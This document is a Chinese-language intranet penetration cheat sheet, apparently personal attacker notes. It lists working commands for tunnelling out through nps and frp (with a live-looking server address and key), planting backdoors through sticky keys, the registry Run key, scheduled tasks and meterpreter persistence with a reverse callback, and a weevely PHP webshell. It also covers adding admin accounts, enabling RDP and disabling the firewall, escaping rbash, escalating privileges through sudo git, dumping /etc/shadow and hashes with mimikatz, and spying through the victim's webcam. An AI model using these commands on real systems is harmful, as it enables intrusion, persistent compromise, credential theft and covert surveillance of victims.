隧道搭建
①regeorg+proxifier搭建
这个有些问题,代理过不了
②nps映射出网
nps的思路
注意事项
下载链接
①下载版本是win_amd64 不是dwrwin
②客户端启动思路
npc.exe -server=121.36.106.169:8024 -vkey=basdefsvzmw8fjgi -type=tcp
③frp隧道
两台机器相通(多少台就多少台映射就好了)如果2台机器都和一台通但本身不通,做双层代理就好了
如 10.10.10.44————>映射到192.168.1.18–>110.40.180.28
方法:
10.10.10.44机器上配置 两台机器都要有frp
192.168.1.18
③viper炫彩蛇内网渗透
viper炫彩蛇内网渗透
内网信息收集攻击
一,内网渗透信息收集总结
拿下shell后一般干的事情
判断所处网络,定位关键目标方法
通过netscan 进行扫描获取
rdp获取密码的方法
二,权限维持专题
1.)利用粘滞键进行权限维持
##①调出粘滞键
粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键
#②执行命令-->作用将粘滞键替换为system权限
cd windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
#③再次调出粘滞键
现在我们连续按下5次shift就弹出一个system权限的cmd
注意事项
①如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:
设置为完全控制
2.)注册表注入后门
直接执行该命令
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"
当管理员重新登录系统时,就会执行后门程序
3.)计划任务后门
#命令:
schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1
#以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks
4.)meterpreter后门
meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A
自动启动一个匹配的
exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动该木马(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动该木马
-X 系统引导时自动启动该木马
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP
5.)web后门–>基于weevely
①利用weevely生成一个php类型的马
②将文件放入服务器目录下,然后执行
weevely http://192.168.220.1/shell.php
③直接执行windows的shell命令即可
如 whoami命令
帮助命令
audit.etcpasswd | 枚举/etc/passwd
audit.userfiles | 列举用户/home下具有权限的文件
audit.mapwebfiles | 枚举任意Web站点的URL链接
shell.php | 编写php文件
shell.sh | 编写系统脚本
system.info | 收集系统信息
find.suidsgid | 查找SUID / SGID文件和目录
find.perms | 查找权限可读/写/可执行文件和目录
backdoor.tcp | TCP端口后门
backdoor.reversetcp | 反弹TCP连接
bruteforce.sql | 爆破指定数据库用户名密码
bruteforce.sqlusers | 爆破所有数据库用户密码
file.upload | 上传本地文件
file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL file.enum | 在本地词表的书面枚举远程文件
file.read | 读文件
file.rm | 删除文件
file.check | 检查远程文件的状态(md5值,大小,权限等)
file.download | 下载远程二进制/ ASCII文件到本地
sql.console | 启动SQL控制台
sql.dump | 备份数据库,即脱库
net.scan | 端口扫描
net.phpproxy | 安装远程php代理
net.ifaces | 显示远程主机网络接口信息
net.proxy | 安装隧道通信代理
三,windows命令
①维持域渗透命令
查看机器属于什么域
net config Workstation
查询有几个域, 查询域列表
net view /domain
查看域控制器主机名
net group "domain controllers" /domain
查询域管理用户
net group "domain admins" /domain
查询域用户列表
net user /domain
查看当前域内机器主机名
net view
查询域内所有计算机主机名
net group "domain computers" /domain
常用命令
1.net user admin admin /add 添加用户的
2. net localgroup administrators admin /add 添加到域的
3.netstat -an 查看端口的
4.强制3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5.关闭防火墙
netsh advfirewall set allprofiles state off
6.credssp加密问题 (3389连接连接不上的时候,可以用这个连接)
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 00000002 /f
②连接命令
ssh连接方法
ssh tom@127.127.0.0 -p 7744
#即连接方法
ftp
ftp-->(连接方法)
①启动ftp
②open +ip
③user 即可连接
telnet
telnet(注意使用的话,需要启用windows功能中的telnet客户端)
使用方法(与ftp有点类似)
telnet ip 端口
open(即开始连接)
连接ssh以及ftp类方法
连接不上原因–>服务端的ssh版本过老导致
Unable to negotiate with 172.16.255.253 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
Linux账户提权
rbash限制权限
如果用户进入后发觉无权限
即反复爆
-rbash
提权方法
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
#即可提部分权限
linux基础命令以及账号限制提权权限类
linux常用基础命令
方法:典型切换账号进行提权即可
如从tom账号切换到jerry账号
#切换账号命令
su jerry
#然后输入密码即可
提权
sudo -l
#进行-->查看该用户可对什么目录进行操作
#然后利用该目录进行提权即可
如git提权类状况特点
sudo git help config#先输入这个
!/bin/bash#或者!'sh'完成提权
#在输入!/bin/bash进行提取即可
sudo git -p help
!/bin/bash
成功提权为root
linux横向收集方法
#①基础命令
cat ../../../../etc/passwd
cat ../../../etc/shadow
cat ~/.bash_history
②组合使用
cat /etc/shadow | grep *** #寻找自己想要用户的密码值
authconfig --test | grep hashing #判断加密方式
windows系统内网渗透
常见命令
msf工具攻击命令常用
①截屏
screenshot
②开启摄像头且拍照
webcam_stream #通过摄像头开启视频
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
③获取管理员密码mimikatz模块使用
load mimikatz
https://blog.csdn.net/weixin_45116657/article/details/103147716
④hashdump获取hash值类
然后拿hash解密即可登录
⑤后渗透的常见命令
https://blog.csdn.net/qq_46717339/article/details/113804776
⑥添加3389
enable_rdp脚本开启3389
run post/windows/manage/enable_rdp
添加新的用户用于登录
run post/windows/manage/enable_rdp USERNAME=WWW PASSWORD=WWW